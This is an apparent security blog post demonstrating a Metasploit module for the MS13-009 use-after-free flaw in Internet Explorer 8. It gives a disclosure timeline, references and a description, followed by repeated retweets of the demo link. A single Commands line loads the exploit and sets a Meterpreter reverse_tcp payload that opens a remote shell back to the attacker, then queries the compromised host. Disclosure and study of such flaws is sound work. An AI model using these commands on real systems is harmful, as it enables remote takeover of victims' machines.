Timeline :
Vulnerability discovered and reported to vendor by Scott Bell
Coordinated public release of the vulnerability the 2013-02-12
Metasploit PoC provided the 2013-02-21
PoC provided by :
Reference(s) :
CVE-2013-0025
OSVDB-90122
BID-57830
MS13-009
Affected version(s) :
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed.
Commands :
use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec
RT @eromang: MS13-009 #Microsoft Internet Explorer SLayoutRun UAF #Metasploit Demo http://t.co/EajvAVfzz0 #infosec